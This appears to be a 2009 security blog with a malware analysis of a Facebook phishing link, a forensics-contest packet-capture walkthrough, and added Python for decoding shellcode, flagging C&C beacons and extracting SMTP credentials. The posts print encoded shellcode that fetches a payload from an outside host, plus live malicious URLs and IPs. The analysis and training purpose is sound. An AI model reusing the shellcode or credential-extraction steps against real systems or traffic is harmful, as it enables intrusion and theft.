Thursday, November 26, 2009

Received an email in my spam box this morning with a link:

http://www.facebook.com.ferdasxe.be/usersdirectory/LoginFacebook.php?ref=[32 Char Number]&email=[My Email]

The domain resolves to a number of IPs:

www.facebook.com.ferdasxe.be. 1783 IN A 190.120.139.2
www.facebook.com.ferdasxe.be. 1783 IN A 190.247.140.107
www.facebook.com.ferdasxe.be. 1783 IN A 201.17.33.210
www.facebook.com.ferdasxe.be. 1783 IN A 201.165.72.35
www.facebook.com.ferdasxe.be. 1783 IN A 201.226.241.26
www.facebook.com.ferdasxe.be. 1783 IN A 210.112.142.61
www.facebook.com.ferdasxe.be. 1783 IN A 213.248.149.69
www.facebook.com.ferdasxe.be. 1783 IN A 60.50.84.69
www.facebook.com.ferdasxe.be. 1783 IN A 115.252.47.55
www.facebook.com.ferdasxe.be. 1783 IN A 117.242.112.254
www.facebook.com.ferdasxe.be. 1783 IN A 186.32.89.215
www.facebook.com.ferdasxe.be. 1783 IN A 189.105.95.34
www.facebook.com.ferdasxe.be. 1783 IN A 189.179.6.137
www.facebook.com.ferdasxe.be. 1783 IN A 190.7.132.216
www.facebook.com.ferdasxe.be. 1783 IN A 190.37.112.49

An iframe on this page grabs /sv/in.php from 193.104.27.234

JavaScript within in.php grabs /sv/xd/pdf.pdf from 193.104.27.234

80758e30f8beb7fa79f6346b85f6cf31 pdf.pdf

Which contains more JavaScript:


(Snipped)
{
var vvpethya = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%u33AB%uB8C0%u6461%u0000%u6850%u6854%u6572%u2435%u691C%u5074%u5354%uAAB8%u0DFC%uFF7C%u0455%uF88B%uC483%uB00C%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u4CC2%u5052%u36B8%u2F1A%uFF70%u0455%u575B%uB856%uFE98%u0E8A%u55FF%u6A04%uFF00%u68D7%u7474%u3A70%u2F2F%u3931%u2E33%u3031%u2E34%u3732%u322E%u3433%u732F%u2F76%u6F6C%u6461%u702E%u7068");
(Snipped)

This grabs load.php from the /sv/ directory on host 193.104.27.234. This IP is hosted in Russia.
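As an added example (my own code, not part of the original post), the Python below decodes a %uXXXX-escaped JavaScript string into the bytes it would occupy in memory and then runs a strings(1)-style scan over them. Applied to the unescape() payload quoted above it surfaces the load.php URL the post names without executing anything. The payload constant is the string from the PDF as shown above; the function names are my own.

```python
import re

# The %u-escaped payload quoted above, copied from the PDF's JavaScript (analysis input only).
PAYLOAD = (
    "%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB"
    "%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB"
    "%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3"
    "%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238"
    "%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324"
    "%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3"
    "%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2"
    "%uB84F%u2E65%u7865%u66AB%u6698%u33AB%uB8C0%u6461%u0000%u6850"
    "%u6854%u6572%u2435%u691C%u5074%u5354%uAAB8%u0DFC%uFF7C%u0455"
    "%uF88B%uC483%uB00C%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72"
    "%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455"
    "%uC283%u837F%u4CC2%u5052%u36B8%u2F1A%uFF70%u0455%u575B%uB856"
    "%uFE98%u0E8A%u55FF%u6A04%uFF00%u68D7%u7474%u3A70%u2F2F%u3931"
    "%u2E33%u3031%u2E34%u3732%u322E%u3433%u732F%u2F76%u6F6C%u6461"
    "%u702E%u7068"
)

# %uXXXX = one UTF-16 code unit, %XX = one byte, anything else = a literal character
_TOKEN = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})|(.)", re.DOTALL)


def decode_js_unescape(s):
    """Reverse JavaScript unescape() into raw bytes.

    Each %uXXXX code unit is stored little-endian in memory (0xC033 -> 33 C0),
    which is the byte order the shellcode depends on when the string is sprayed
    onto the heap, so that is the order we reproduce here."""
    out = bytearray()
    for m in _TOKEN.finditer(s):
        if m.group(1):
            out += int(m.group(1), 16).to_bytes(2, "little")
        elif m.group(2):
            out.append(int(m.group(2), 16))
        else:
            out += m.group(3).encode("latin-1")
    return bytes(out)


def printable_strings(data, min_len=4):
    """Runs of printable ASCII, the same idea as the Unix strings(1) tool."""
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def extract_urls(data):
    """Pull http(s) URLs out of decoded bytes; these are the indicators worth blocking."""
    return [u.decode("ascii") for u in re.findall(rb"https?://[\x21-\x7e]+", data)]


if __name__ == "__main__":
    raw = decode_js_unescape(PAYLOAD)
    print("decoded %d bytes, starts with %s" % (len(raw), raw[:4].hex()))
    for s in printable_strings(raw):
        print("string:", s)
    for u in extract_urls(raw):
        print("URL:", u)
```

The decoded bytes begin 33 C0 64 8B (xor eax,eax; mov ... fs:[...]), the usual opening of position-independent shellcode that walks the PEB, and the last string recovered is the download URL quoted in the post. Fragments such as "urlm" and "on.d" appear as separate short runs because the loader pushes the DLL name four bytes at a time.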

C&C Traffic:

POST /beslip/gate.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: 193.104.41.68
....
snip
....
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 26 Nov 2009 18:36:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
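As an added example (my own code, not from the original post), here is a small detection routine that parses a raw HTTP request head and flags the traits visible in the beacon above: a Host header that is a bare IP address, a POST to a gate.php endpoint, and an IE6 User-Agent string. The sample requests are constructed from the headers quoted above plus one ordinary request for contrast; the function names are my own.

```python
import ipaddress
import re

# Constructed samples: the beacon quoted above (headers as shown, body omitted)
# and an ordinary request for contrast.
SAMPLE_REQUESTS = [
    "POST /beslip/gate.php HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; "
    ".NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)\r\n"
    "Host: 193.104.41.68\r\n\r\n",
    "GET /news/index.html HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:3.5) Gecko/20090824 Firefox/3.5\r\n\r\n",
]


def parse_request(raw):
    """Split an HTTP/1.x request head into method, path and a lower-cased header dict."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers}


def is_ip_literal(host):
    """True when the Host header is an IPv4 address (optional :port) rather than a name.

    Legitimate sites are reached by hostname; malware that hard-codes its controller
    frequently sends the raw IP, exactly as the capture above does."""
    host = re.sub(r":\d+$", "", host.strip())
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def beacon_indicators(req):
    """Return the heuristics this request trips; all three come from the capture above."""
    hits = []
    if is_ip_literal(req["headers"].get("host", "")):
        hits.append("Host header is an IP literal, not a hostname")
    if req["method"] == "POST" and re.search(r"/gate\.php$", req["path"]):
        hits.append("POST to a gate.php endpoint")
    if "MSIE 6.0" in req["headers"].get("user-agent", ""):
        hits.append("IE6-era User-Agent string")
    return hits


if __name__ == "__main__":
    for raw in SAMPLE_REQUESTS:
        req = parse_request(raw)
        print(req["method"], req["path"], "->", beacon_indicators(req) or "clean")
```

None of these traits is conclusive alone; an IP-literal Host header from a workstation that otherwise browses by name, combined with a fixed POST path, is the kind of pairing worth an alert in proxy logs.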


Tuesday, November 24, 2009

Network Forensics Contest - Part II Answers

Woohoo....I got them all right. I kind of figured I would though - if not, I should find a new job.

I'm talking about ForensicsContest.com - a site to help educate the masses and keep security teams sharp.

If you haven't done packet capture analysis in a while, I suggest you visit the site and start from the beginning.

Linux Walkthru:

1. What is Ann’s email address?
2. What is Ann’s email password?
3. What is Ann’s secret lover’s email address?
4. What two items did Ann tell her secret lover to bring?
5. What is the NAME of the attachment Ann sent to her secret lover?
6. What is the MD5sum of the attachment Ann sent to her secret lover?
7. In what CITY and COUNTRY is their rendez-vous point?
8. What is the MD5sum of the image embedded in the document?


First things first, verify the MD5SUM of the evidence file:

$ md5sum evidence02.pcap
cfac149a49175ac8e89d5b5b5d69bad3 evidence02.pcap

Next, view the packet capture with tcpdump and pick out the email authentication:

$ tcpdump -Alnqvvvs0 -r evidence02.pcap port 587 | less

.....

250-AUTH=LOGIN PLAIN XAOL-UAS-MB
250-AUTH LOGIN PLAIN XAOL-UAS-MB
250-STARTTLS
250-CHUNKING
250-BINARYMIME
250-X-AOL-FWD-BY-REF
250-X-AOL-DIV_TAG
250-X-AOL-OUTBOX-COPY
250 HELP

06:35:31.222415 IP (tos 0x0, ttl 128, id 126, offset 0, flags [DF], proto TCP (6), length 52) 192.168.1.159.1036 > 64.12.102.142.587: tcp 12
E..4.~@....d....@.f....K....&6.3P.......AUTH LOGIN

06:35:31.222996 IP (tos 0x0, ttl 127, id 7762, offset 0, flags [none], proto TCP (6), length 40) 64.12.102.142.587 > 192.168.1.159.1036: tcp 0
E..(.R......@.f......K..&6.3....P...x...
06:35:31.332979 IP (tos 0x0, ttl 127, id 7763, offset 0, flags [none], proto TCP (6), length 58) 64.12.102.142.587 > 192.168.1.159.1036: tcp 18
E..:.S......@.f......K..&6.3....P....J..334 VXNlcm5hbWU6

06:35:31.333745 IP (tos 0x0, ttl 128, id 127, offset 0, flags [DF], proto TCP (6), length 66) 192.168.1.159.1036 > 64.12.102.142.587: tcp 26
E..B..@....U....@.f....K....&6.EP...O...c25lYWt5ZzMza0Bhb2wuY29t

06:35:31.334435 IP (tos 0x0, ttl 127, id 7764, offset 0, flags [none], proto TCP (6), length 40) 64.12.102.142.587 > 192.168.1.159.1036: tcp 0
E..(.T......@.f......K..&6.E....P...x...
06:35:31.444079 IP (tos 0x0, ttl 127, id 7765, offset 0, flags [none], proto TCP (6), length 58) 64.12.102.142.587 > 192.168.1.159.1036: tcp 18
E..:.U......@.f......K..&6.E....P....6..334 UGFzc3dvcmQ6

06:35:31.444690 IP (tos 0x0, ttl 128, id 128, offset 0, flags [DF], proto TCP (6), length 54) 192.168.1.159.1036 > 64.12.102.142.587: tcp 14
E..6..@....`....@.f....K....&6.WP...S
..NTU4cjAwbHo=

Pay special attention to the 334 status code:

334 VXNlcm5hbWU6 => Username:

334 UGFzc3dvcmQ6 => Password:

Immediately following each 334 status code is another base64 encoded string:

c25lYWt5ZzMza0Bhb2wuY29t => sneakyg33k@aol.com

NTU4cjAwbHo= => 558r00lz

As you can see, you have the first two answers - this isn't going to be too hard. (Yes, I know about tools like ettercap, mailsnarf and dsniff that will extract this data off the wire - let's pretend we don't know about them.)
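As an added example (my own code, not from the original post), the Python below walks the AUTH LOGIN dialogue by hand: every server "334" line is a base64 prompt, and the client's next line is the base64 answer to it. It also records whether STARTTLS completed before the attempt, which is the point a defender cares about: in this capture the credentials crossed the wire readable. The transcript is constructed from the tcpdump output above with the IP/TCP framing stripped; the final 235 reply is an assumption, since the post does not show the server's answer to the password.

```python
import base64

# Constructed transcript of the exchange shown above. "C" is the client
# (192.168.1.159), "S" the server (64.12.102.142). The 235 line is assumed.
CAPTURED_EXCHANGE = [
    ("S", "250-AUTH LOGIN PLAIN XAOL-UAS-MB"),
    ("S", "250-STARTTLS"),
    ("S", "250 HELP"),
    ("C", "AUTH LOGIN"),
    ("S", "334 VXNlcm5hbWU6"),
    ("C", "c25lYWt5ZzMza0Bhb2wuY29t"),
    ("S", "334 UGFzc3dvcmQ6"),
    ("C", "NTU4cjAwbHo="),
    ("S", "235 2.7.0 Authentication successful"),
]


def b64_text(token):
    """Decode one base64 token to text (AUTH LOGIN prompts and answers are ASCII)."""
    return base64.b64decode(token.strip(), validate=True).decode("utf-8", "replace")


def extract_auth_login(exchange):
    """Recover AUTH LOGIN credentials from an SMTP dialogue.

    Returns one dict per attempt with the decoded username/password, whether
    the server accepted it (235) or refused it (535), and whether STARTTLS had
    completed beforehand. Anything sent before STARTTLS is visible to every
    hop on the path, which is why this capture gives the answers away."""
    attempts = []
    current = None          # the attempt being filled in
    prompt = None           # lower-cased prompt awaiting the client's answer
    starttls_sent = False
    tls_active = False

    for side, line in exchange:
        line = line.strip()
        if side == "C" and line.upper() == "STARTTLS":
            starttls_sent = True
        elif side == "S" and starttls_sent and line.startswith("220"):
            tls_active = True   # a real capture would be opaque from here on
        elif side == "C" and line.upper().startswith("AUTH LOGIN"):
            current = {"username": None, "password": None,
                       "over_tls": tls_active, "accepted": None}
            attempts.append(current)
            prompt = None
        elif current is None:
            continue
        elif side == "S" and line.startswith("334"):
            # "334 VXNlcm5hbWU6" -> "Username:" -> key "username"
            prompt = b64_text(line.split(None, 1)[1]).rstrip(":").lower()
        elif side == "C" and prompt is not None:
            current[prompt] = b64_text(line)
            prompt = None
        elif side == "S" and line[:3] in ("235", "535"):
            current["accepted"] = line.startswith("235")
            current = None
    return attempts


def cleartext_logins(exchange):
    """Detection view: attempts whose credentials crossed the wire unencrypted."""
    return [a for a in extract_auth_login(exchange) if not a["over_tls"]]


if __name__ == "__main__":
    for attempt in extract_auth_login(CAPTURED_EXCHANGE):
        print(attempt)
```

The same walk works on any AUTH LOGIN session; the server advertised STARTTLS in its EHLO banner, so the fix on the client side is simply to negotiate it before authenticating.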

Looking at the packet capture you'll see an email to sec558@gmail.com, but read carefully: the question is "What is Ann’s secret lover’s email address?" The email to sec558 doesn't appear to be loving:

Sorry-- I can't do lunch next week after all. Heading out of town. Another time! -Ann.

A little further into the capture we see another email, this time to mistersecretx@aol.com:

Hi sweetheart! Bring your fake passport and a bathing suit. Address attached. love, Ann.

With an attachment:

Content-Transfer-Encoding: base64.
Content-Disposition: attachment;.
filename="secretrendezvous.docx"

Using Wireshark, follow the TCP stream for this packet and extract the base64-encoded attachment.

I used openssl to decode the base64 content like so:

$ openssl base64 -d -in email-attachment.b64 -out secretrendezvous.docx

DOCX files are also PKZIP archives, as the "file" command shows:

$ md5sum secretrendezvous.docx; file secretrendezvous.docx
9e423e11db88f01bbff81172839e1923 secretrendezvous.docx
secretrendezvous.docx: Zip archive data, at least v2.0 to extract

By unzipping the file, you are able to extract image1.png:

$ md5sum image1.png; file image1.png
aadeace50997b1ba24b09ac2ef1940b7 image1.png
image1.png: PNG image, 756 x 439, 8-bit/color RGB, non-interlaced

Which gives you the last two answers.
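As an added example (my own code, not from the original post), the Python below carries the last three steps through programmatically: decode the base64 body of the attachment, confirm it is a zip container, and hash every file under word/media/ in the package. The real attachment is not reproduced here, so build_sample_attachment() constructs a minimal DOCX-shaped zip with a placeholder image; the function names are my own.

```python
import base64
import hashlib
import io
import zipfile


def build_sample_attachment():
    """Construct a stand-in for the captured attachment: a minimal DOCX-shaped zip
    holding one embedded image, base64-encoded the way it travelled in the SMTP body.
    Returns (base64_text, md5_of_the_embedded_image)."""
    fake_png = b"\x89PNG\r\n\x1a\n" + b"constructed placeholder, not a real image"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("word/media/image1.png", fake_png)
    # encodebytes() wraps at 76 columns, like a MIME body
    return base64.encodebytes(buf.getvalue()).decode("ascii"), hashlib.md5(fake_png).hexdigest()


def decode_attachment(b64_body):
    """Equivalent of `openssl base64 -d`; line breaks in a MIME body are ignored."""
    return base64.b64decode(b64_body)


def embedded_media(docx_bytes):
    """Return {path: (md5, size)} for every file under word/media/ in the package.

    A DOCX is an Office Open XML package, i.e. a zip file, so it must begin with
    the PK local-file-header signature that the `file` command reported."""
    if not docx_bytes.startswith(b"PK\x03\x04"):
        raise ValueError("not a zip container: DOCX files start with PK\\x03\\x04")
    found = {}
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for info in z.infolist():
            if info.filename.startswith("word/media/") and not info.is_dir():
                data = z.read(info)
                found[info.filename] = (hashlib.md5(data).hexdigest(), len(data))
    return found


if __name__ == "__main__":
    body, expected = build_sample_attachment()
    docx = decode_attachment(body)
    print("attachment md5:", hashlib.md5(docx).hexdigest())
    for name, (digest, size) in embedded_media(docx).items():
        print(name, digest, size, "OK" if digest == expected else "MISMATCH")
```

Hashing the extracted bytes rather than a file on disk avoids the usual trap of hashing a re-saved copy; the unzip-then-md5sum route in the post gives the same answer because unzip writes the stored bytes unchanged.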



Total time from download to completion, including screenshotting all of my work, took less than 15 minutes.

I would have had enough time to meet Ann at the airport, steal her identity and enjoy my trip to Mexico! :)


Reloading the old site

Many of you know that I used to have another blog, and some of you may notice that it disappeared. It's still there, if you look hard enough, but I won't be making any updates.

I just don't have the time like I used to, and I feel a blog shouldn't be "professional" only. So here goes - the old old blog is new again, and if you like what I have to write, you're welcome to follow. Don't expect me to stay on topic - and don't expect updates too frequently. I'll put up a Twitter feed on the right-hand side of the page for those who choose to follow me there.
